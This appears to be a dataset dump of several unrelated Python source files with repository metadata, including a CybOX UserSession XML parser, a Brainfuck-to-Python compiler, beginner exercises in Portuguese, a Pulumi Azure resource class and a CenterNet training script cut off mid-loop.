'Hashes': cybox_common.HashListType,
'Segments': cybox_common.HashSegmentsType,
'Segment_Count': cybox_common.IntegerObjectPropertyType,
'Usage_Context_Assumption': cybox_common.StructuredTextType,
'Block_Hash': cybox_common.FuzzyHashBlockType,
'Dependency': cybox_common.DependencyType,
'Effective_Group_ID': cybox_common.StringObjectPropertyType,
'Trigger_Point': cybox_common.HexBinaryObjectPropertyType,
'Environment_Variable': cybox_common.EnvironmentVariableType,
'Byte_Run': cybox_common.ByteRunType,
'Contributors': cybox_common.PersonnelType,
'Image_Offset': cybox_common.IntegerObjectPropertyType,
'Imports': cybox_common.ImportsType,
'Library': cybox_common.LibraryType,
'References': cybox_common.ToolReferencesType,
'Internal_Strings': cybox_common.InternalStringsType,
'Time': cybox_common.TimeType,
'Custom_Properties': cybox_common.CustomPropertiesType,
'Configuration_Setting': cybox_common.ConfigurationSettingType,
'Libraries': cybox_common.LibrariesType,
'Function': cybox_common.StringObjectPropertyType,
'Description': cybox_common.StructuredTextType,
'User_Account_Info': cybox_common.ObjectPropertiesType,
'Build_Configuration': cybox_common.BuildConfigurationType,
'Address': cybox_common.HexBinaryObjectPropertyType,
'Search_Within': cybox_common.IntegerObjectPropertyType,
'Segment': cybox_common.HashSegmentType,
'English_Translation': cybox_common.StringObjectPropertyType,
'Name': cybox_common.StringObjectPropertyType,
'Signature_Description': cybox_common.StringObjectPropertyType,
'Block_Size': cybox_common.IntegerObjectPropertyType,
'Compiler_Platform_Specification': cybox_common.PlatformSpecificationType,
'Fuzzy_Hash_Value': cybox_common.FuzzyHashValueType,
'Dependency_Description': cybox_common.StructuredTextType,
'Contributor': cybox_common.ContributorType,
'Tools': cybox_common.ToolsInformationType,
'Data_Size': cybox_common.DataSizeType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'User_Session'
rootClass = UserSessionObjectType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout.write, 0, name_="User_Session",
# namespacedef_='')
return rootObj
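# Usage sketch (comment only, not part of the generated module; the file name and
# accessed element are illustrative):
#     xml = open('user_session.xml').read()
#     session = parseString(xml)         # returns a UserSessionObjectType
#     login = session.get_Login_Time()   # cybox_common.DateTimeObjectPropertyType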
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"UserSessionObjectType"
]
| 42.239709 | 212 | 0.628919 |
bdbeae8c5e94063442dd245fc2d7640bd6810f7e | 45 | py | Python | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | sneakers/exceptions.py | rsolanoweb/sneakers-archive | a71e67511e501e21fbc0ec7ac1cd940740d4aa11 | [
"MIT"
] | null | null | null | class BrandDoesNotExist(Exception):
pass
| 15 | 35 | 0.777778 |
7e14ef905e9eeefb6a6c81832438f8081ae17dc0 | 4,912 | py | Python | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | 1 | 2022-02-02T19:22:49.000Z | 2022-02-02T19:22:49.000Z | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | 1 | 2021-11-21T05:03:59.000Z | 2022-03-20T00:42:19.000Z | bftools/compiler.py | BobDotCom/bftools | 6b3e0e55f2e5154f5d48d9606ac18833120c1420 | [
"MIT"
] | null | null | null | import warnings
from typing import List, Tuple, Optional
from .enums import Symbol, Code
class CompiledBrainfuck:
def __init__(self) -> None:
"""An object to represent python compiled from Brainfuck. To recieve the decoded text, use :attr:`result` or
str(:class:`DecodedBrainfuck`).
.. warning::
This class is not intended to be instantiated directly. Use :meth:`decode` or :meth:`BrainfuckTools.decode`
instead.
Attributes
----------
result: Optional[str]
The result code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
"""
self._raw_parsed: Optional[List[Symbol]] = []
self.result: Optional[str] = None
def __str__(self) -> str:
return self.result
@property
def code(self) -> Optional[str]:
"""The compiled code.
.. deprecated:: 0.3.0
The code property is deprecated and will be removed in 0.5.0. Use :attr:`result` or
str(:class:`CompiledBrainfuck`) instead.
Returns
-------
Optional[str]
The compiled code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
"""
warnings.warn("The text property is deprecated since 0.3.0 and will be removed in 0.5.0. Use "
"DecodedBrainfuck.result or str(DecodedBrainfuck) instead.", DeprecationWarning, stacklevel=2)
return self.result
@property
def raw_parsed(self) -> Optional[Tuple[Symbol]]:
"""
Raw parsed code. This will never be ``None`` unless :meth:`parse` has not been called. Since the library
always calls :meth:`parse` before returning the object, this should never happen unless you override the
functionality of the library.
.. note::
This is meant to be used internally and you should not need to use it.
.. versionchanged:: 0.3.0
Now returns ``None`` instead of raising a ValueError.
Returns
-------
Optional[Tuple[Symbol]]
The raw parsed code.
"""
if self._raw_parsed is None:
return None
return tuple(self._raw_parsed)
def parse(self, code: str) -> None:
"""Parse the given code.
.. note::
You should not need to use this method. It is intended for internal use only, so you should only need to use
it if you override the functionality of the library. This method is not dangerous like
:meth:`DecodedBrainfuck.parse` is.
Parameters
----------
code: str
The code to parse.
"""
self._raw_parsed = []
for character in code:
try:
parsed = Symbol(character)
self._raw_parsed.append(parsed)
except ValueError: # TODO: add support for comments
# Since comments are not supported yet, let's just skip for now
continue
self.result = """
main = bytearray(30000)
position = 0
"""
indentation = 0
stackable = (Symbol.SHIFTLEFT, Symbol.SHIFTRIGHT, Symbol.ADD, Symbol.SUBTRACT)
stack_level = 0
stack_type = None
for symbol in self.raw_parsed:
if symbol in stackable and stack_type == symbol:
stack_level += 1
stack_type = symbol
continue
else:
if stack_level > 0:
self.result += f"\n{' ' * 4 * indentation}{Code[stack_type.name].value.format(stack_level)}"
stack_level = 0
if symbol in stackable:
stack_level += 1
stack_type = symbol
continue
self.result += f"\n{' ' * 4 * indentation}{Code[symbol.name].value}"
if symbol == Symbol.STARTLOOP:
indentation += 1
elif symbol == Symbol.ENDLOOP:
indentation -= 1
try:
import python_minifier
except ImportError:
class Minifier:
@staticmethod
def minify(c: str, **kwargs) -> str:
return c
python_minifier = Minifier
self.result = python_minifier.minify(
self.result,
remove_literal_statements=True,
rename_globals=True,
)
self.result = "# Compiled using bftools (https://github.com/BobDotCom/bftools)\n" + self.result
| 37.212121 | 120 | 0.573901 |
526256609c1e54792efa138bca96da4d26d76bb9 | 1,305 | py | Python | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | ex095.py | CarlosEduardoAS/Python-exercicios | c0063660191a86e83f25708239b62b6764a51670 | [
"MIT"
] | null | null | null | jogador = {}
lista = []
while True:
jogador.clear()
print('---'*11)
jogador['nome'] = str(input('Nome do jogador: ')).strip().capitalize()
np = int(input(f'Quantas partidas {jogador["nome"]} jogou? '))
gols = []
tot = 0
for c in range(0, np):
g = (int(input(f'Quantos gols na {c+1}º partida? ')))
gols.append(g)
tot += g
jogador['gols'] = gols
jogador['total'] = tot
lista.append(jogador.copy())
op = ' '
while op not in 'sn':
op = str(input('Quer continuar? [S/N] ')).lower()[0]
if op == 'n':
break
print('-='*30)
print('cod ', end='')
for i in jogador.keys():
print(f'{i:<15}', end='')
print()
print('---'*13)
for k, v in enumerate(lista):
print(f'{k:>3} ', end='')
for d in v.values():
print(f'{str(d):<15}', end='')
print()
print('---'*13)
while True:
busca = int(input('Mostrar dados de qual jogador? (999 para parar) '))
if busca == 999:
break
if busca >= len(lista):
        print(f'ERRO! Não existe jogador com código {busca}.')
else:
print(f' -- LEVANTAMENTO DO JOGADOR {lista[busca]["nome"]}:')
for i, g in enumerate(lista[busca]['gols']):
print(f' No jogo {i+1} fez {g} gols.')
print('-'*40)
print('<< VOLTE SEMPRE >>') | 29 | 74 | 0.527203 |
d14470ab7dfa31c657a382a082295b76321b6649 | 21,699 | py | Python | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/timeseriesinsights/gen1_environment.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Gen1EnvironmentArgs', 'Gen1Environment']
@pulumi.input_type
class Gen1EnvironmentArgs:
def __init__(__self__, *,
data_retention_time: pulumi.Input[str],
kind: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
sku: pulumi.Input['SkuArgs'],
environment_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Gen1Environment resource.
:param pulumi.Input[str] data_retention_time: ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
:param pulumi.Input[str] kind: The kind of the environment.
Expected value is 'Gen1'.
:param pulumi.Input[str] resource_group_name: Name of an Azure Resource group.
:param pulumi.Input['SkuArgs'] sku: The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
:param pulumi.Input[str] environment_name: Name of the environment
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]] partition_key_properties: The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
:param pulumi.Input[Union[str, 'StorageLimitExceededBehavior']] storage_limit_exceeded_behavior: The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value pairs of additional properties for the resource.
"""
pulumi.set(__self__, "data_retention_time", data_retention_time)
pulumi.set(__self__, "kind", 'Gen1')
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "sku", sku)
if environment_name is not None:
pulumi.set(__self__, "environment_name", environment_name)
if location is not None:
pulumi.set(__self__, "location", location)
if partition_key_properties is not None:
pulumi.set(__self__, "partition_key_properties", partition_key_properties)
if storage_limit_exceeded_behavior is not None:
pulumi.set(__self__, "storage_limit_exceeded_behavior", storage_limit_exceeded_behavior)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dataRetentionTime")
def data_retention_time(self) -> pulumi.Input[str]:
"""
ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
"""
return pulumi.get(self, "data_retention_time")
@data_retention_time.setter
def data_retention_time(self, value: pulumi.Input[str]):
pulumi.set(self, "data_retention_time", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
The kind of the environment.
Expected value is 'Gen1'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Name of an Azure Resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> pulumi.Input['SkuArgs']:
"""
The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: pulumi.Input['SkuArgs']):
pulumi.set(self, "sku", value)
@property
@pulumi.getter(name="environmentName")
def environment_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the environment
"""
return pulumi.get(self, "environment_name")
@environment_name.setter
def environment_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location of the resource.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="partitionKeyProperties")
def partition_key_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]]:
"""
The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
"""
return pulumi.get(self, "partition_key_properties")
@partition_key_properties.setter
def partition_key_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TimeSeriesIdPropertyArgs']]]]):
pulumi.set(self, "partition_key_properties", value)
@property
@pulumi.getter(name="storageLimitExceededBehavior")
def storage_limit_exceeded_behavior(self) -> Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]]:
"""
The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
"""
return pulumi.get(self, "storage_limit_exceeded_behavior")
@storage_limit_exceeded_behavior.setter
def storage_limit_exceeded_behavior(self, value: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]]):
pulumi.set(self, "storage_limit_exceeded_behavior", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value pairs of additional properties for the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Gen1Environment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_retention_time: Optional[pulumi.Input[str]] = None,
environment_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
An environment is a set of time-series data available for query, and is the top level Azure Time Series Insights resource. Gen1 environments have data retention limits.
API Version: 2020-05-15.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] data_retention_time: ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
:param pulumi.Input[str] environment_name: Name of the environment
:param pulumi.Input[str] kind: The kind of the environment.
Expected value is 'Gen1'.
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]] partition_key_properties: The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
:param pulumi.Input[str] resource_group_name: Name of an Azure Resource group.
:param pulumi.Input[pulumi.InputType['SkuArgs']] sku: The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
:param pulumi.Input[Union[str, 'StorageLimitExceededBehavior']] storage_limit_exceeded_behavior: The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value pairs of additional properties for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Gen1EnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
An environment is a set of time-series data available for query, and is the top level Azure Time Series Insights resource. Gen1 environments have data retention limits.
API Version: 2020-05-15.
:param str resource_name: The name of the resource.
:param Gen1EnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(Gen1EnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_retention_time: Optional[pulumi.Input[str]] = None,
environment_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
partition_key_properties: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TimeSeriesIdPropertyArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
storage_limit_exceeded_behavior: Optional[pulumi.Input[Union[str, 'StorageLimitExceededBehavior']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = Gen1EnvironmentArgs.__new__(Gen1EnvironmentArgs)
if data_retention_time is None and not opts.urn:
raise TypeError("Missing required property 'data_retention_time'")
__props__.__dict__["data_retention_time"] = data_retention_time
__props__.__dict__["environment_name"] = environment_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'Gen1'
__props__.__dict__["location"] = location
__props__.__dict__["partition_key_properties"] = partition_key_properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["storage_limit_exceeded_behavior"] = storage_limit_exceeded_behavior
__props__.__dict__["tags"] = tags
__props__.__dict__["creation_time"] = None
__props__.__dict__["data_access_fqdn"] = None
__props__.__dict__["data_access_id"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["status"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:timeseriesinsights:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20170228preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20170228preview:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20171115:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20171115:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20180815preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20180815preview:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20200515:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20200515:Gen1Environment"), pulumi.Alias(type_="azure-native:timeseriesinsights/v20210630preview:Gen1Environment"), pulumi.Alias(type_="azure-nextgen:timeseriesinsights/v20210630preview:Gen1Environment")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Gen1Environment, __self__).__init__(
'azure-native:timeseriesinsights:Gen1Environment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Gen1Environment':
"""
Get an existing Gen1Environment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = Gen1EnvironmentArgs.__new__(Gen1EnvironmentArgs)
__props__.__dict__["creation_time"] = None
__props__.__dict__["data_access_fqdn"] = None
__props__.__dict__["data_access_id"] = None
__props__.__dict__["data_retention_time"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["partition_key_properties"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["status"] = None
__props__.__dict__["storage_limit_exceeded_behavior"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return Gen1Environment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> pulumi.Output[str]:
"""
The time the resource was created.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter(name="dataAccessFqdn")
def data_access_fqdn(self) -> pulumi.Output[str]:
"""
The fully qualified domain name used to access the environment data, e.g. to query the environment's events or upload reference data for the environment.
"""
return pulumi.get(self, "data_access_fqdn")
@property
@pulumi.getter(name="dataAccessId")
def data_access_id(self) -> pulumi.Output[str]:
"""
An id used to access the environment data, e.g. to query the environment's events or upload reference data for the environment.
"""
return pulumi.get(self, "data_access_id")
@property
@pulumi.getter(name="dataRetentionTime")
def data_retention_time(self) -> pulumi.Output[str]:
"""
ISO8601 timespan specifying the minimum number of days the environment's events will be available for query.
"""
return pulumi.get(self, "data_retention_time")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
The kind of the environment.
Expected value is 'Gen1'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partitionKeyProperties")
def partition_key_properties(self) -> pulumi.Output[Optional[Sequence['outputs.TimeSeriesIdPropertyResponse']]]:
"""
The list of event properties which will be used to partition data in the environment. Currently, only a single partition key property is supported.
"""
return pulumi.get(self, "partition_key_properties")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def sku(self) -> pulumi.Output['outputs.SkuResponse']:
"""
The sku determines the type of environment, either Gen1 (S1 or S2) or Gen2 (L1). For Gen1 environments the sku determines the capacity of the environment, the ingress rate, and the billing rate.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def status(self) -> pulumi.Output['outputs.EnvironmentStatusResponse']:
"""
An object that represents the status of the environment, and its internal state in the Time Series Insights service.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="storageLimitExceededBehavior")
def storage_limit_exceeded_behavior(self) -> pulumi.Output[Optional[str]]:
"""
The behavior the Time Series Insights service should take when the environment's capacity has been exceeded. If "PauseIngress" is specified, new events will not be read from the event source. If "PurgeOldData" is specified, new events will continue to be read and old events will be deleted from the environment. The default behavior is PurgeOldData.
"""
return pulumi.get(self, "storage_limit_exceeded_behavior")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| 51.541568 | 982 | 0.679847 |
dabb5812a2d8bec18c2ad29749fe7e5856030bc9 | 391 | py | Python | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | 1 | 2020-09-05T22:25:36.000Z | 2020-09-05T22:25:36.000Z | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | null | null | null | Scripts2/Script18.py | jonfisik/ScriptsPython | 1d15221b3a41a06a189e3e04a5241fa63df9cf3f | [
"MIT"
] | null | null | null | '''Write a program that reads any angle and computes its sine, cosine and tangent.'''
from math import sin
from math import cos
from math import tan
from math import pi
print('------'*5)
grau = int(input(' Qual o valor do ângulo? '))
rad = (grau*pi) / 180
x = sin(rad)
y = cos(rad)
z = tan(rad)
print(' seno - {:.2f}\n cosseno - {:.2f}\n tangente {:.2f}'.format(x,y,z))
print('------'*5) | 27.928571 | 88 | 0.636829 |
24a1aa75639d5c499ed169d6c258480a37185c96 | 3,639 | py | Python | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | 1 | 2022-01-22T18:38:23.000Z | 2022-01-22T18:38:23.000Z | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | null | null | null | src/train_backup.py | Wastoon/CenterNet-Multi-Func-Det | 3cc131d575a2d7bde5813786e048ac1008a5d711 | [
"MIT"
] | 1 | 2021-02-24T06:50:40.000Z | 2021-02-24T06:50:40.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import torch
import torch.utils.data
from opts import opts
from models.model import create_model, load_model, save_model
from models.data_parallel import DataParallel
from logger import Logger
from datasets.dataset_factory import get_dataset
from trains.train_factory import train_factory
def main(opt):
torch.manual_seed(opt.seed)
torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test
Dataset = get_dataset(opt.dataset, opt.task)
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
logger = Logger(opt)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')
print('Creating model...')
model = create_model(opt.arch, opt.heads, opt.head_conv)
optimizer = torch.optim.Adam(model.parameters(), opt.lr)
start_epoch = 0
if opt.load_model != '':
model, optimizer, start_epoch = load_model(
model, opt.load_model, optimizer, opt.resume, opt.lr, opt.lr_step)
Trainer = train_factory[opt.task]
trainer = Trainer(opt, model, optimizer)
trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)
print('Setting up data...')
val_loader = torch.utils.data.DataLoader(
Dataset(opt, 'val'),
batch_size=1,
shuffle=False,
num_workers=1,
pin_memory=True
)
if opt.test:
_, preds = trainer.val(0, val_loader)
val_loader.dataset.run_eval(preds, opt.save_dir)
return
train_loader = torch.utils.data.DataLoader(
Dataset(opt, 'train'),
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
drop_last=True
)
print('Starting training...')
best = 1e10
for epoch in range(start_epoch + 1, opt.num_epochs + 1):
mark = epoch if opt.save_all else 'last'
log_dict_train, _ = trainer.train(epoch, train_loader)
logger.write_epoch('epoch: {} |'.format(epoch))
for k, v in log_dict_train.items():
logger.scalar_summary('train_{}'.format(k), v, epoch)
logger.write_epoch('{} {:8f} | '.format(k, v))
if opt.val_intervals > 0 and epoch % opt.val_intervals == 0:
